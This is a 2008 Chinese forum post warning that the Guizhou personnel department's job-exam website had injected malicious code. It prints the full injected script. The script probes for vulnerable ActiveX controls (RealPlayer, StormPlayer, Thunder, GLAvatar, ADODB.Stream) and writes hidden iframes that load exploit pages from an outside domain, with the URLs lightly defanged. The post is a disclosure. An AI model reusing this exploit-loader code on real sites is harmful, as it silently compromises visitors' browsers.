注意，贵州省人事厅网站发现恶意网址代码

　　听朋友讲今年的公务员招考简章出来了，于是到人事厅网站“贵州人事人才网”查看，找到了“贵州省2008年省、市、县三级机关统一面向社会公开招考公务员简章”。我由于9月份拿不到毕业证书，只得放弃这次考试。凭着对网站网页的敏感，发现此网站有来源不明的网页地址，后确认为刷流量代码。由于此次公务员考试，在带来人事网的流量同时，不知会也给那恶意代码的网址带来多少流量！

恶意网址显露无遗


挖出嵌入到网站页面中的代码

以下为am2.htm中的全部代码

1. 
   
2. <script language="javaScript">
   
3. var cook = "silentwm";
   
4. 
   
5. function setCookie(name, value, expire)
   
6. {   
   
7.   window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
   
8. }
   
9. function getCookie(Name)
   
10. {   
    
11.   var search = Name + "=";
    
12.   if (window.document.cookie.length > 0)
    
13.   {
    
14.    offset = window.document.cookie.indexOf(search);
    
15.    if (offset != -1)
    
16.    {
    
17.     offset += search.length;      
    
18.      end = window.document.cookie.indexOf(";", offset)      
    
19.      if (end == -1)
    
20.        end = window.document.cookie.length;
    
21.      return unescape(window.document.cookie.substring(offset, end));
    
22.     }
    
23.    }
    
24.    return null;
    
25. }
    
26. function register(name)
    
27. {
    
28.   var today = new Date();
    
29.   var expires = new Date();
    
30.   expires.setTime(today.getTime() + 1000*60*60*24);
    
31.   setCookie(cook, name, expires);
    
32. }
    
33. function openWM()
    
34. {
    
35.   var c = getCookie(cook);
    
36.   if (c != null)
    
37.   {
    
38.     return;
    
39.   }
    
40.   
    
41.   register(cook);
    
42.   
    
43.   window.defaultStatus="完成";
    
44.    
    
45.   try{ var e;
    
46.    var ado=(document.createElement("object"));
    
47.    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    
48.    var as=ado.createobject("Adodb.Stream","")}
    
49.   catch(e){};
    
50.   finally{
    
51.    if(e!="[object Error]"){
    
52.     document.write("<iframe width=50 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/ax14.htm></iframe>")}
    
53.    else
    
54.    {
    
55.     try{ var j;
    
56.      var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
    
57.     catch(j){};
    
58.     finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("RODUCTVERSION")<="6.0.14.552")
    
59.                                         {document.write('<iframe width=100 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/re10.htm></iframe>')}
    
60.                          else
    
61.                          {
    
62.      document.write('<iframe width=100 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/re11.htm></iframe>')}}}
    
63.     try{ var g;
    
64.      var glworld=new ActiveXObject("GLAVATAR.GLAvatarCtrl.1");}
    
65.     catch(g){};
    
66.     finally{if(g!="[object Error]"){
    
67.      document.write('<iframe style=display:none src=h-t-t-p去掉-://ww1.pigzd.cn/axlz.htm></iframe>')}}
    
68.     try{ var h;
    
69.      var storm=new ActiveXObject("MPS.StormPlayer.1");}
    
70.     catch(h){};
    
71.     finally{if(h!="[object Error]"){
    
72.      document.write('<iframe style=display:none src=h-t-t-p去掉-://ww1.pigzd.cn/bb.htm></iframe>')}}
    
73.     try{ var f;
    
74.      var thunder=new ActiveXObject("DPClient.Vod");}
    
75.     catch(f){};
    
76.     finally{ if(f!="[object Error]"){
    
77.      document.write('<iframe width=50 height=0 src=xl.gif></iframe>')}}
    
78.    }}
    
79. }
    
80. openWM();
    
81. </script>
    
82. <script language="javascript" type="text/javascript" src="h-t-t-p去掉-://js.users.51.la/1862269.js"></script>
    

复制代码

[ 本帖最后由 正安一片瓦 于 2008-5-23 15:32 编辑 ]

瓦片厉害

下午19点，再次查看时，网页中的恶意代码已经被清除了！！ldem45